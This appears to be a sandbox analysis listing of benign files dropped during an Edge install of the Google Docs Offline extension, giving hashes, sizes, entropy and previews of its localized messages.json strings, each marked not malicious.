                                                                                                                                                                                                                                                                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):961
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):959
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                        MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                        SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                        SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                        SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):968
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                        MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                        SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                        SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                        SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                        MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                        SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                        SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                        SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1305
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                        MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                        SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                        SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                        SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):911
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                        MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                        SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                        SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                        SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):939
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                        MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                        SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                        SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                        SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):972
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):990
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1672
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):935
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                        Download File
